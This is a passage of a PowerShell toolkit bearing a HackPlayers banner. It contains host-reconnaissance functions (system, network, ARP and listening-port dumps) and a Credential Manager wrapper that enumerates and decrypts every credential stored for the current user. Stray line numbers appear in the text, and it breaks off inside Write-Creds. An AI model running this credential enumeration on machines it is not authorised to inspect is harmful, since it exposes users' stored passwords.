# ASCII-art banner for the toolkit. Nothing in this part of the file prints it,
# so presumably a later section does. It lives in a double-quoted here-string:
# every "``" pair is an escaped single backtick and a "$" would be expanded, so
# keep that in mind if the art is ever edited.
$banner = @"
 .-----. .'``-.
 / ,-- | .- ``-.
 ,' ,-' ``. _.-' ,-.``.)
 ; / ,=---``--+' .- -. ``.
( \ ,' =,- ,' ( o ) | /\
 : : / =,-' / \-' ;(o :
 \ | ' ; ( ``--' \ ;
 \ | = | \``--+ --. ``(
 ``+ =/ : : ``. ``. \
 ' =/ \ ``--. '-. ``. ``.
 \ =; ``._ : ( ``-. ``. ``.
 \ = ; ``._.' ``-.-``-._\ ``-.
 \= ' _.-'_) (::::)
 ``+ -. ``--7' ``--``..'
 ( : .' ;
 \ | | /
 \ | _.-| +---'
 ``--+ ``. \ \
 /``. '-.-\ ``--.
 / /#### ``----.'
 ( ,-'############\
 \\/###############;
 \###############/
 l1c0rd3b3ll0t4 |--------------| _.---------
 :::::::::::::::|_.-''
 ::::::::::_.-''
 .-''..'---'-------'' CyberVaca@HackPlayers
"@
31
32
33
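function Get-Info {
<#
.Synopsis
    One-object summary of the local host: OS build, hardware, domain and primary NIC.

.Description
    Everything is read from the registry and WMI instead of being scraped from
    the localized output of systeminfo.exe / getmac.exe, so the values no longer
    depend on the display language or the column layout of those tools (the old
    "memo" / (getmac)[3] parsing only worked on Spanish and English boxes).
    Network values are taken from a single adapter - the first one that has a
    default gateway - so IP, mask, gateway, DNS and MAC all belong together.
    Nothing is written to disk.

.OUTPUTS
    [PSCustomObject] with the members Nombre, Sistema Operativo, Procesador,
    Modelo, Dominio, Num. Procesadores, Direccion IP, Mascara de SubRed,
    Puerta de Enlace, Servidores DNS, MAC and RAM. A member whose source is
    unavailable is $null instead of aborting the whole function.
#>
    # REG_MULTI_SZ network values come back as string[]; return the first usable
    # entry, preferring the static value over the DHCP-assigned one. "0.0.0.0"
    # is what a DHCP client reports as its static address and is skipped.
    function Select-FirstValue {
        param($Static, $Dhcp)
        foreach ($value in @($Static) + @($Dhcp)) {
            if ($value -and $value -ne '0.0.0.0') { return $value }
        }
        return $null
    }

    $currentVersion = Get-ItemProperty "Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
    $sistema_operativo = "{0} Build {1}" -f $currentVersion.ProductName, $currentVersion.CurrentBuild
    $modelo_equipo = (Get-ItemProperty "registry::HKLM\HARDWARE\DESCRIPTION\System\BIOS").SystemProductName
    $num_procesadores = @(Get-ItemProperty "registry::HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\*").Count
    $procesador = (Get-ItemProperty "registry::HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0").ProcessorNameString

    # CurrentControlSet is the control set actually in use; ControlSet001 only
    # usually happens to be the same one.
    $interfaces = @(Get-ItemProperty "registry::HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\*" -ErrorAction SilentlyContinue)
    $iface = $interfaces | Where-Object { Select-FirstValue $_.DefaultGateway $_.DhcpDefaultGateway } | Select-Object -First 1
    if ($null -eq $iface) { $iface = $interfaces | Select-Object -First 1 }

    $ip   = Select-FirstValue $iface.IPAddress      $iface.DhcpIPAddress
    $mask = Select-FirstValue $iface.SubnetMask     $iface.DhcpSubnetMask
    $gw   = Select-FirstValue $iface.DefaultGateway $iface.DhcpDefaultGateway
    $dns  = Select-FirstValue $iface.NameServer     $iface.DhcpNameServer
    if ($dns) { $dns = $dns.Replace(",", " ") }

    # The registry subkey name is the adapter GUID, which WMI exposes as SettingID;
    # use it to pick the MAC of the same adapter, else fall back to the first
    # IP-enabled adapter.
    $nics = @(Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled = TRUE" -ErrorAction SilentlyContinue)
    $nic = $nics | Where-Object { $iface -and $_.SettingID -eq $iface.PSChildName } | Select-Object -First 1
    if ($null -eq $nic) { $nic = $nics | Select-Object -First 1 }
    $mac = if ($nic) { $nic.MACAddress } else { $null }

    # Physical RAM from WMI (bytes), reported in whole MB like the old systeminfo parse.
    $ramBytes = (Get-WmiObject Win32_ComputerSystem -ErrorAction SilentlyContinue).TotalPhysicalMemory
    $ram = if ($ramBytes) { "{0} MB" -f [math]::Round($ramBytes / 1MB) } else { $null }

    [PSCustomObject][ordered]@{
        "Nombre"            = $env:COMPUTERNAME
        "Sistema Operativo" = $sistema_operativo
        "Procesador"        = $procesador
        "Modelo"            = $modelo_equipo
        "Dominio"           = $env:USERDNSDOMAIN
        "Num. Procesadores" = $num_procesadores
        "Direccion IP"      = $ip
        "Mascara de SubRed" = $mask
        "Puerta de Enlace"  = $gw
        "Servidores DNS"    = $dns
        "MAC"               = $mac
        "RAM"               = $ram
    }
}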
function Get-Discosduros {
    # Every drive backed by the FileSystem provider, as a Name/Root table.
    Get-PSDrive -PSProvider FileSystem | Format-Table Name, Root
}
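function Get-ConfigRED {
<#
.Synopsis
    Dumps the ARP cache and the TCP sockets in LISTENING state.

.Description
    Runs inside a background job (as the original did) so a hanging arp/netstat
    cannot block the caller. The job is now removed once its output has been
    collected instead of being left behind in Get-Job.

.Notes
    The "Conexiones Activas" section only shows LISTENING sockets, not
    established connections; drop the Select-String filter to see everything.
    Both tools print localized, human-oriented text - do not parse it blindly.
#>
    Start-Job -ScriptBlock {
        Write-Host "`n[+] ==================================== Tabla ARP ===========================================`n"
        # -a is the documented "display all entries" switch of arp.exe
        arp -a
        Write-Host "`n[+] ==================================== Conexiones Activas ===========================================`n"
        netstat -ano | Select-String "LISTENING" | Out-String
    } | Receive-Job -Wait -AutoRemoveJob
}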
# Windows Credential Manager front-end. The inline C# class PsUtils.CredMan
# (compiled with Add-Type further down) wraps the advapi32 Cred* API; the nested
# helper functions and CredManMain read these parameters through scope, and the
# selected action runs when CredManMain is called at the end of this body.
# NOTE(review): -Pass is an ordinary [String], so the secret lands in the process
# command line, PSReadLine history and any transcript; nothing here scrubs it.
function credman {
Param
(
 [Parameter(Mandatory=$false)][Switch] $AddCred,   # write/update -Target/-User/-Pass
 [Parameter(Mandatory=$false)][Switch] $DelCred,   # delete -Target
 [Parameter(Mandatory=$false)][Switch] $GetCred,   # read and print -Target
 [Parameter(Mandatory=$false)][Switch] $ShoCred,   # enumerate the caller's whole store
 [Parameter(Mandatory=$false)][Switch] $RunTests,  # C# self test: writes and deletes a credential named "Target"
 [Parameter(Mandatory=$false)][ValidateLength(1,32767) <# CRED_MAX_GENERIC_TARGET_NAME_LENGTH #>][String] $Target,
 [Parameter(Mandatory=$false)][ValidateLength(1,512) <# CRED_MAX_USERNAME_LENGTH #>][String] $User,
 [Parameter(Mandatory=$false)][ValidateLength(1,512) <# CRED_MAX_CREDENTIAL_BLOB_SIZE #>][String] $Pass,
 [Parameter(Mandatory=$false)][ValidateLength(1,256) <# CRED_MAX_STRING_LENGTH #>][String] $Comment,
 [Parameter(Mandatory=$false)][Switch] $All,       # consulted by -ShoCred (see CredManMain)
 [Parameter(Mandatory=$false)][ValidateSet("GENERIC",
 "DOMAIN_PASSWORD",
 "DOMAIN_CERTIFICATE",
 "DOMAIN_VISIBLE_PASSWORD",
 "GENERIC_CERTIFICATE",
 "DOMAIN_EXTENDED",
 "MAXIMUM",
 "MAXIMUM_EX")][String] $CredType = "GENERIC",      # wincred.h CRED_TYPE_* without the prefix
 [Parameter(Mandatory=$false)][ValidateSet("SESSION",
 "LOCAL_MACHINE",
 "ENTERPRISE")][String] $CredPersist = "ENTERPRISE" # wincred.h CRED_PERSIST_* without the prefix
)
98
99#region Pinvoke
100#region Inline C#
101[String] $PsCredmanUtils = @"
102using System;
103using System.Runtime.InteropServices;
104
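namespace PsUtils
{
    /// <summary>
    /// Thin managed wrapper around the Win32 Credential Manager API (advapi32
    /// CredRead/CredWrite/CredEnumerate/CredDelete). Every public method returns
    /// 0 on success or the HRESULT of the last Win32 error; nothing throws across
    /// the PowerShell boundary except the handle guards below.
    /// </summary>
    /// <remarks>
    /// Decrypted secrets come back as managed strings in Credential.CredentialBlob;
    /// those are immutable and stay in memory until the GC reclaims them, so do not
    /// assume they are gone once the caller drops its reference.
    /// This text is compiled at run time by Add-Type under Windows PowerShell, so it
    /// must stay C# 5 compatible and must not contain "$" or backtick characters.
    /// </remarks>
    public class CredMan
    {
        #region Imports
        // DllImport derives from System.Runtime.InteropServices
        [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredDeleteW", CharSet = CharSet.Unicode)]
        private static extern bool CredDeleteW([In] string target, [In] CRED_TYPE type, [In] int reservedFlag);

        [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredEnumerateW", CharSet = CharSet.Unicode)]
        private static extern bool CredEnumerateW([In] string Filter, [In] int Flags, out int Count, out IntPtr CredentialPtr);

        [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredFree")]
        private static extern void CredFree([In] IntPtr cred);

        [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredReadW", CharSet = CharSet.Unicode)]
        private static extern bool CredReadW([In] string target, [In] CRED_TYPE type, [In] int reservedFlag, out IntPtr CredentialPtr);

        [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredWriteW", CharSet = CharSet.Unicode)]
        private static extern bool CredWriteW([In] ref Credential userCredential, [In] UInt32 flags);
        #endregion

        #region Fields
        /// <summary>CREDENTIAL.Flags bits (wincred.h CRED_FLAGS_*).</summary>
        public enum CRED_FLAGS : uint
        {
            NONE = 0x0,
            PROMPT_NOW = 0x2,
            USERNAME_TARGET = 0x4
        }

        /// <summary>HRESULT-form Win32 errors the API is known to return.</summary>
        public enum CRED_ERRORS : uint
        {
            ERROR_SUCCESS = 0x0,
            ERROR_INVALID_PARAMETER = 0x80070057,
            ERROR_INVALID_FLAGS = 0x800703EC,
            ERROR_NOT_FOUND = 0x80070490,
            ERROR_NO_SUCH_LOGON_SESSION = 0x80070520,
            ERROR_BAD_USERNAME = 0x8007089A
        }

        /// <summary>CREDENTIAL.Persist values (wincred.h CRED_PERSIST_*).</summary>
        public enum CRED_PERSIST : uint
        {
            SESSION = 1,
            LOCAL_MACHINE = 2,
            ENTERPRISE = 3
        }

        /// <summary>CREDENTIAL.Type values (wincred.h CRED_TYPE_*).</summary>
        public enum CRED_TYPE : uint
        {
            GENERIC = 1,
            DOMAIN_PASSWORD = 2,
            DOMAIN_CERTIFICATE = 3,
            DOMAIN_VISIBLE_PASSWORD = 4,
            GENERIC_CERTIFICATE = 5,
            DOMAIN_EXTENDED = 6,
            MAXIMUM = 7, // Maximum supported cred type
            MAXIMUM_EX = (MAXIMUM + 1000), // Allow new applications to run on old OSes
        }

        /// <summary>
        /// Managed view of a CREDENTIAL. It is marshalled directly by CredWriteW, so
        /// field order and types must match wincred.h exactly. CredentialBlobSize is
        /// a BYTE count: for a UTF-16 string blob that is 2 * the character count.
        /// </summary>
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct Credential
        {
            public CRED_FLAGS Flags;
            public CRED_TYPE Type;
            public string TargetName;
            public string Comment;
            public DateTime LastWritten;
            public UInt32 CredentialBlobSize;
            public string CredentialBlob;
            public CRED_PERSIST Persist;
            public UInt32 AttributeCount;
            public IntPtr Attributes;
            public string TargetAlias;
            public string UserName;
        }

        /// <summary>Raw CREDENTIAL layout as returned by CredReadW / CredEnumerateW.</summary>
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        private struct NativeCredential
        {
            public CRED_FLAGS Flags;
            public CRED_TYPE Type;
            public IntPtr TargetName;
            public IntPtr Comment;
            public System.Runtime.InteropServices.ComTypes.FILETIME LastWritten;
            public UInt32 CredentialBlobSize;
            public IntPtr CredentialBlob;
            public UInt32 Persist;
            public UInt32 AttributeCount;
            public IntPtr Attributes;
            public IntPtr TargetAlias;
            public IntPtr UserName;
        }
        #endregion

        #region Child Class
        /// <summary>
        /// Owns a PCREDENTIAL (or PCREDENTIAL[]) allocated by advapi32 and releases it
        /// with CredFree. Dispose it (using) as soon as the data has been copied out.
        /// </summary>
        private class CriticalCredentialHandle : Microsoft.Win32.SafeHandles.CriticalHandleZeroOrMinusOneIsInvalid
        {
            public CriticalCredentialHandle(IntPtr preexistingHandle)
            {
                SetHandle(preexistingHandle);
            }

            /// <summary>Copies one native CREDENTIAL into the managed Credential struct.</summary>
            private static Credential XlateNativeCred(IntPtr pCred)
            {
                NativeCredential ncred = (NativeCredential)Marshal.PtrToStructure(pCred, typeof(NativeCredential));
                Credential cred = new Credential();
                cred.Type = ncred.Type;
                cred.Flags = ncred.Flags;
                cred.Persist = (CRED_PERSIST)ncred.Persist;

                // FILETIME halves are exposed as signed ints; widen them through uint so a
                // set top bit in dwLowDateTime is not sign-extended. The old code added the
                // low half as a (possibly negative) int, which produced a wrong timestamp
                // whenever that bit was set.
                long lastWritten = ((long)(uint)ncred.LastWritten.dwHighDateTime << 32)
                                 | (uint)ncred.LastWritten.dwLowDateTime;
                cred.LastWritten = DateTime.FromFileTime(lastWritten);

                cred.UserName = Marshal.PtrToStringUni(ncred.UserName);
                cred.TargetName = Marshal.PtrToStringUni(ncred.TargetName);
                cred.TargetAlias = Marshal.PtrToStringUni(ncred.TargetAlias);
                cred.Comment = Marshal.PtrToStringUni(ncred.Comment);
                cred.CredentialBlobSize = ncred.CredentialBlobSize;
                if (0 < ncred.CredentialBlobSize && ncred.CredentialBlob != IntPtr.Zero)
                {
                    // The blob is opaque bytes. Reading it as UTF-16 is right for
                    // password-style credentials and yields garbage for binary ones.
                    cred.CredentialBlob = Marshal.PtrToStringUni(ncred.CredentialBlob, (int)ncred.CredentialBlobSize / 2);
                }
                return cred;
            }

            /// <summary>Translates the single CREDENTIAL this handle points at.</summary>
            public Credential GetCredential()
            {
                if (IsInvalid)
                {
                    throw new InvalidOperationException("Invalid CriticalHandle!");
                }
                return XlateNativeCred(handle);
            }

            /// <summary>Translates the PCREDENTIAL[count] array this handle points at.</summary>
            public Credential[] GetCredentials(int count)
            {
                if (IsInvalid)
                {
                    throw new InvalidOperationException("Invalid CriticalHandle!");
                }
                Credential[] credentials = new Credential[count];
                for (int inx = 0; inx < count; inx++)
                {
                    IntPtr pTemp = Marshal.ReadIntPtr(handle, inx * IntPtr.Size);
                    credentials[inx] = XlateNativeCred(pTemp);
                }
                return credentials;
            }

            override protected bool ReleaseHandle()
            {
                if (IsInvalid)
                {
                    return false;
                }
                CredFree(handle);
                SetHandleAsInvalid();
                return true;
            }
        }
        #endregion

        #region Custom API
        /// <summary>Deletes the credential stored for target/type. Returns 0 or an HRESULT.</summary>
        public static int CredDelete(string target, CRED_TYPE type)
        {
            if (!CredDeleteW(target, type, 0))
            {
                return Marshal.GetHRForLastWin32Error();
            }
            return 0;
        }

        /// <summary>
        /// Enumerates the caller's credentials. A null, empty or "*" filter returns
        /// everything (CRED_ENUMERATE_ALL_CREDENTIALS on Vista and later). On failure
        /// Credentials is an empty array - never null - and the HRESULT is returned.
        /// </summary>
        public static int CredEnum(string Filter, out Credential[] Credentials)
        {
            int count = 0;
            int flags = 0x0;
            if (string.IsNullOrEmpty(Filter) ||
                "*" == Filter)
            {
                Filter = null;
                if (6 <= Environment.OSVersion.Version.Major)
                {
                    flags = 0x1; // CRED_ENUMERATE_ALL_CREDENTIALS; only valid on Vista and later
                }
            }
            IntPtr pCredentials = IntPtr.Zero;
            if (!CredEnumerateW(Filter, flags, out count, out pCredentials))
            {
                Credentials = new Credential[0];
                return Marshal.GetHRForLastWin32Error();
            }
            // The whole PCREDENTIAL[] is a single allocation; CredFree it deterministically
            // once copied instead of waiting for the CriticalHandle finalizer.
            using (CriticalCredentialHandle credHandle = new CriticalCredentialHandle(pCredentials))
            {
                Credentials = credHandle.IsInvalid ? new Credential[0] : credHandle.GetCredentials(count);
            }
            return 0;
        }

        /// <summary>Reads one credential. Returns 0 or an HRESULT (ERROR_NOT_FOUND when absent).</summary>
        public static int CredRead(string target, CRED_TYPE type, out Credential Credential)
        {
            IntPtr pCredential = IntPtr.Zero;
            Credential = new Credential();
            if (!CredReadW(target, type, 0, out pCredential))
            {
                return Marshal.GetHRForLastWin32Error();
            }
            using (CriticalCredentialHandle credHandle = new CriticalCredentialHandle(pCredential))
            {
                Credential = credHandle.GetCredential();
            }
            return 0;
        }

        /// <summary>Writes (creates or replaces) a credential. Returns 0 or an HRESULT.</summary>
        public static int CredWrite(Credential userCredential)
        {
            if (!CredWriteW(ref userCredential, 0))
            {
                return Marshal.GetHRForLastWin32Error();
            }
            return 0;
        }

        #endregion

        /// <summary>Self-test helper: writes a throw-away GENERIC credential named "Target".</summary>
        private static int AddCred()
        {
            Credential Cred = new Credential();
            string Password = "Password";
            Cred.Flags = 0;
            Cred.Type = CRED_TYPE.GENERIC;
            Cred.TargetName = "Target";
            Cred.UserName = "UserName";
            Cred.AttributeCount = 0;
            Cred.Persist = CRED_PERSIST.ENTERPRISE;
            // Size is the BYTE length of the UTF-16 blob, not the character count;
            // using Password.Length here stored only the first half of the password.
            Cred.CredentialBlobSize = (uint)System.Text.Encoding.Unicode.GetByteCount(Password);
            Cred.CredentialBlob = Password;
            Cred.Comment = "Comment";
            return CredWrite(Cred);
        }

        /// <summary>Prints the outcome of one self-test step; true only on ERROR_SUCCESS.</summary>
        private static bool CheckError(string TestName, CRED_ERRORS Rtn)
        {
            switch(Rtn)
            {
                case CRED_ERRORS.ERROR_SUCCESS:
                    Console.WriteLine(string.Format("'{0}' worked", TestName));
                    return true;
                case CRED_ERRORS.ERROR_INVALID_FLAGS:
                case CRED_ERRORS.ERROR_INVALID_PARAMETER:
                case CRED_ERRORS.ERROR_NO_SUCH_LOGON_SESSION:
                case CRED_ERRORS.ERROR_NOT_FOUND:
                case CRED_ERRORS.ERROR_BAD_USERNAME:
                    Console.WriteLine(string.Format("'{0}' failed; {1}.", TestName, Rtn));
                    break;
                default:
                    Console.WriteLine(string.Format("'{0}' failed; 0x{1}.", TestName, Rtn.ToString("X")));
                    break;
            }
            return false;
        }

        /*
         * Note: the Main() function is primarily for debugging and testing in a Visual
         * Studio session. Although it will work from PowerShell, it's not very useful.
         * It writes a real credential ("Target"/"UserName"/"Password") into the
         * calling user's store and deletes it again at the end.
         */
        public static void Main()
        {
            Credential[] Creds = null;
            Credential Cred = new Credential();
            int Rtn = 0;

            Console.WriteLine("Testing CredWrite()");
            Rtn = AddCred();
            if (!CheckError("CredWrite", (CRED_ERRORS)Rtn))
            {
                return;
            }
            Console.WriteLine("Testing CredEnum()");
            Rtn = CredEnum(null, out Creds);
            if (!CheckError("CredEnum", (CRED_ERRORS)Rtn))
            {
                return;
            }
            Console.WriteLine("Testing CredRead()");
            Rtn = CredRead("Target", CRED_TYPE.GENERIC, out Cred);
            if (!CheckError("CredRead", (CRED_ERRORS)Rtn))
            {
                return;
            }
            Console.WriteLine("Testing CredDelete()");
            Rtn = CredDelete("Target", CRED_TYPE.GENERIC);
            if (!CheckError("CredDelete", (CRED_ERRORS)Rtn))
            {
                return;
            }
            Console.WriteLine("Testing CredRead() again");
            Rtn = CredRead("Target", CRED_TYPE.GENERIC, out Cred);
            if (!CheckError("CredRead", (CRED_ERRORS)Rtn))
            {
                Console.WriteLine("if the error is 'ERROR_NOT_FOUND', this result is OK.");
            }
        }
    }
}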
409"@
410#endregion
411
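# Compile the inline helper once per session. Probing with "-as [Type]" yields
# $null when the type is not loaded yet and produces no error record, so there
# is nothing to pop off $Error afterwards. The old try/catch removed
# $Error[$Error.Count-1], which is the OLDEST entry in $Error, not the one it
# had just generated ($Error[0] is the most recent).
if ($null -eq ('PsUtils.CredMan' -as [Type]))
{
    Add-Type -TypeDefinition $PsCredmanUtils
}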
426#endregion
427
428#region Internal Tools
# HRESULT -> ErrorCategory name used when the helpers below build ErrorRecords.
# PowerShell parses these hex literals into the same negative [int] that
# Marshal.GetHRForLastWin32Error returns, so the lookup keys line up.
[HashTable] $ErrorCategory = @{}
$ErrorCategory[0x80070057] = "InvalidArgument"   # ERROR_INVALID_PARAMETER
$ErrorCategory[0x800703EC] = "InvalidData"       # ERROR_INVALID_FLAGS
$ErrorCategory[0x80070490] = "ObjectNotFound"    # ERROR_NOT_FOUND
$ErrorCategory[0x80070520] = "SecurityError"     # ERROR_NO_SUCH_LOGON_SESSION
$ErrorCategory[0x8007089A] = "SecurityError"     # ERROR_BAD_USERNAME
434
function Get-CredType
{
<#
.Synopsis
    Maps a CredType name onto the matching [PsUtils.CredMan+CRED_TYPE] value.

.PARAMETER CredType
    One of the wincred CRED_TYPE_* names without the prefix (see ValidateSet).
#>
    Param
    (
        [Parameter(Mandatory=$true)][ValidateSet("GENERIC",
                                                 "DOMAIN_PASSWORD",
                                                 "DOMAIN_CERTIFICATE",
                                                 "DOMAIN_VISIBLE_PASSWORD",
                                                 "GENERIC_CERTIFICATE",
                                                 "DOMAIN_EXTENDED",
                                                 "MAXIMUM",
                                                 "MAXIMUM_EX")][String] $CredType
    )

    # ValidateSet restricts the input to the enum's member names, so a by-name
    # cast yields exactly the value the former switch table returned.
    return [PsUtils.CredMan+CRED_TYPE]$CredType
}
461
function Get-CredPersist
{
<#
.Synopsis
    Maps a CredPersist name onto the matching [PsUtils.CredMan+CRED_PERSIST] value.

.PARAMETER CredPersist
    SESSION, LOCAL_MACHINE or ENTERPRISE (wincred CRED_PERSIST_* without the prefix).
#>
    Param
    (
        [Parameter(Mandatory=$true)][ValidateSet("SESSION",
                                                 "LOCAL_MACHINE",
                                                 "ENTERPRISE")][String] $CredPersist
    )

    # Same trick as Get-CredType: the validated name is also the enum member name.
    return [PsUtils.CredMan+CRED_PERSIST]$CredPersist
}
478#endregion
479
480#region Dot-Sourced API
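function Del-Creds
{
<#
.Synopsis
    Deletes the specified credentials

.Description
    Calls Win32 CredDeleteW via [PsUtils.CredMan]::CredDelete. Only the calling
    user's store is touched and there is no confirmation prompt.

.INPUTS
    See function-level notes

.OUTPUTS
    0 if successful
    [Management.Automation.ErrorRecord] if the API call failed or threw

.PARAMETER Target
    Specifies the URI for which the credentials are associated.
    Non-GENERIC types are limited to 337 characters
    (CRED_MAX_DOMAIN_TARGET_NAME_LENGTH), the same limit Read-Creds and
    Write-Creds enforce; this function used to skip that check.

.PARAMETER CredType
    Specifies the desired credentials type; defaults to "GENERIC"
#>

    Param
    (
        [Parameter(Mandatory=$true)][ValidateLength(1,32767)][String] $Target,
        [Parameter(Mandatory=$false)][ValidateSet("GENERIC",
                                                  "DOMAIN_PASSWORD",
                                                  "DOMAIN_CERTIFICATE",
                                                  "DOMAIN_VISIBLE_PASSWORD",
                                                  "GENERIC_CERTIFICATE",
                                                  "DOMAIN_EXTENDED",
                                                  "MAXIMUM",
                                                  "MAXIMUM_EX")][String] $CredType = "GENERIC"
    )

    if("GENERIC" -ne $CredType -and 337 -lt $Target.Length) #CRED_MAX_DOMAIN_TARGET_NAME_LENGTH
    {
        [String] $Msg = "Target field is longer ($($Target.Length)) than allowed (max 337 characters)"
        [Management.ManagementException] $MgmtException = New-Object Management.ManagementException($Msg)
        [Management.Automation.ErrorRecord] $ErrRcd = New-Object Management.Automation.ErrorRecord($MgmtException, 666, 'LimitsExceeded', $null)
        return $ErrRcd
    }

    [Int] $Results = 0
    try
    {
        $Results = [PsUtils.CredMan]::CredDelete($Target, $(Get-CredType $CredType))
    }
    catch
    {
        # hand the exception back as the ErrorRecord callers already check for
        return $_
    }
    if(0 -ne $Results)
    {
        [String] $Msg = "Failed to delete credentials store for target '$Target'"
        [Management.ManagementException] $MgmtException = New-Object Management.ManagementException($Msg)
        [Management.Automation.ErrorRecord] $ErrRcd = New-Object Management.Automation.ErrorRecord($MgmtException, $Results.ToString("X"), $ErrorCategory[$Results], $null)
        return $ErrRcd
    }
    return $Results
}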
536
function Enum-Creds
{
<#
.Synopsis
    Enumerates stored credentials for operating user

.Description
    Calls Win32 CredEnumerateW via [PsUtils.CredMan]::CredEnum. Each returned
    element carries the decrypted blob in its CredentialBlob member.

.INPUTS


.OUTPUTS
    [PsUtils.CredMan+Credential[]] if successful (or if the store is simply
    empty for the filter - ERROR_NOT_FOUND is not treated as a failure)
    [Management.Automation.ErrorRecord] if unsuccessful or error encountered

.PARAMETER Filter
    Specifies the filter to be applied to the query
    Defaults to [String]::Empty

#>

    Param
    (
        [Parameter(Mandatory=$false)][AllowEmptyString()][String] $Filter = [String]::Empty
    )

    [PsUtils.CredMan+Credential[]] $Creds = [Array]::CreateInstance([PsUtils.CredMan+Credential], 0)
    [Int] $Results = 0
    try
    {
        $Results = [PsUtils.CredMan]::CredEnum($Filter, [Ref]$Creds)
    }
    catch
    {
        return $_
    }

    # 0 = success; 0x80070490 (ERROR_NOT_FOUND) only means nothing matched, and
    # the caller gets whatever CredEnum left in $Creds.
    if(0 -eq $Results -or 0x80070490 -eq $Results)
    {
        return $Creds
    }

    [String] $Msg = "Failed to enumerate credentials store for user '$Env:UserName'"
    [Management.ManagementException] $MgmtException = New-Object Management.ManagementException($Msg)
    [Management.Automation.ErrorRecord] $ErrRcd = New-Object Management.Automation.ErrorRecord($MgmtException, $Results.ToString("X"), $ErrorCategory[$Results], $null)
    return $ErrRcd
}
588
function Read-Creds
{
<#
.Synopsis
    Reads specified credentials for operating user

.Description
    Calls Win32 CredReadW via [PsUtils.CredMan]::CredRead

.INPUTS

.OUTPUTS
    [PsUtils.CredMan+Credential] if successful
    $null if nothing is stored for Target/CredType (ERROR_NOT_FOUND)
    [Management.Automation.ErrorRecord] if unsuccessful or error encountered

.PARAMETER Target
    Specifies the URI for which the credentials are associated (mandatory).
    Non-GENERIC types are limited to 337 characters
    (CRED_MAX_DOMAIN_TARGET_NAME_LENGTH).

.PARAMETER CredType
    Specifies the desired credentials type; defaults to "GENERIC"
#>

    Param
    (
        [Parameter(Mandatory=$true)][ValidateLength(1,32767)][String] $Target,
        [Parameter(Mandatory=$false)][ValidateSet("GENERIC",
                                                  "DOMAIN_PASSWORD",
                                                  "DOMAIN_CERTIFICATE",
                                                  "DOMAIN_VISIBLE_PASSWORD",
                                                  "GENERIC_CERTIFICATE",
                                                  "DOMAIN_EXTENDED",
                                                  "MAXIMUM",
                                                  "MAXIMUM_EX")][String] $CredType = "GENERIC"
    )

    # Domain-type targets have a tighter limit than GENERIC ones.
    if("GENERIC" -ne $CredType -and 337 -lt $Target.Length) #CRED_MAX_DOMAIN_TARGET_NAME_LENGTH
    {
        [String] $Msg = "Target field is longer ($($Target.Length)) than allowed (max 337 characters)"
        [Management.ManagementException] $MgmtException = New-Object Management.ManagementException($Msg)
        [Management.Automation.ErrorRecord] $ErrRcd = New-Object Management.Automation.ErrorRecord($MgmtException, 666, 'LimitsExceeded', $null)
        return $ErrRcd
    }

    [PsUtils.CredMan+Credential] $Cred = New-Object PsUtils.CredMan+Credential
    [Int] $Results = 0
    try
    {
        $Results = [PsUtils.CredMan]::CredRead($Target, $(Get-CredType $CredType), [Ref]$Cred)
    }
    catch
    {
        return $_
    }

    if(0x80070490 -eq $Results) #ERROR_NOT_FOUND
    {
        return $null
    }
    if(0 -ne $Results)
    {
        [String] $Msg = "Error reading credentials for target '$Target' from '$Env:UserName' credentials store"
        [Management.ManagementException] $MgmtException = New-Object Management.ManagementException($Msg)
        [Management.Automation.ErrorRecord] $ErrRcd = New-Object Management.Automation.ErrorRecord($MgmtException, $Results.ToString("X"), $ErrorCategory[$Results], $null)
        return $ErrRcd
    }
    return $Cred
}
658
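function Write-Creds
{
<#
.Synopsis
    Saves or updates specified credentials for operating user

.Description
    Calls Win32 CredWriteW via [PsUtils.CredMan]::CredWrite. The password is
    stored as a UTF-16 blob; CredentialBlobSize is the byte length of that
    encoding, as the API requires.

.INPUTS

.OUTPUTS
    0 if successful
    [Management.Automation.ErrorRecord] if unsuccessful or error encountered

.PARAMETER Target
    Specifies the URI for which the credentials are associated
    If not provided, the username is used as the target

.PARAMETER UserName
    Specifies the user name of the credential to be written

.PARAMETER Password
    Specifies the password of the credential to be written. It is never
    echoed back in error messages (the previous version put the clear-text
    password into the ErrorRecord text, where it ended up in transcripts
    and logs).

.PARAMETER Comment
    Allows the caller to specify the comment associated with these
    credentials; defaults to "Last edited by DOMAIN\user on COMPUTER"

.PARAMETER CredType
    Specifies the desired credentials type; defaults to "GENERIC"

.PARAMETER CredPersist
    Specifies the desired credentials storage type; defaults to "ENTERPRISE"
#>

    Param
    (
        [Parameter(Mandatory=$false)][ValidateLength(0,32767)][String] $Target, # CRED_MAX_GENERIC_TARGET_NAME_LENGTH (was mistyped as 32676)
        [Parameter(Mandatory=$true)][ValidateLength(1,512)][String] $UserName,
        [Parameter(Mandatory=$true)][ValidateLength(1,512)][String] $Password,
        [Parameter(Mandatory=$false)][ValidateLength(0,256)][String] $Comment = [String]::Empty,
        [Parameter(Mandatory=$false)][ValidateSet("GENERIC",
                                                  "DOMAIN_PASSWORD",
                                                  "DOMAIN_CERTIFICATE",
                                                  "DOMAIN_VISIBLE_PASSWORD",
                                                  "GENERIC_CERTIFICATE",
                                                  "DOMAIN_EXTENDED",
                                                  "MAXIMUM",
                                                  "MAXIMUM_EX")][String] $CredType = "GENERIC",
        [Parameter(Mandatory=$false)][ValidateSet("SESSION",
                                                  "LOCAL_MACHINE",
                                                  "ENTERPRISE")][String] $CredPersist = "ENTERPRISE"
    )

    if([String]::IsNullOrEmpty($Target))
    {
        $Target = $UserName
    }
    if("GENERIC" -ne $CredType -and 337 -lt $Target.Length) #CRED_MAX_DOMAIN_TARGET_NAME_LENGTH
    {
        [String] $Msg = "Target field is longer ($($Target.Length)) than allowed (max 337 characters)"
        [Management.ManagementException] $MgmtException = New-Object Management.ManagementException($Msg)
        [Management.Automation.ErrorRecord] $ErrRcd = New-Object Management.Automation.ErrorRecord($MgmtException, 666, 'LimitsExceeded', $null)
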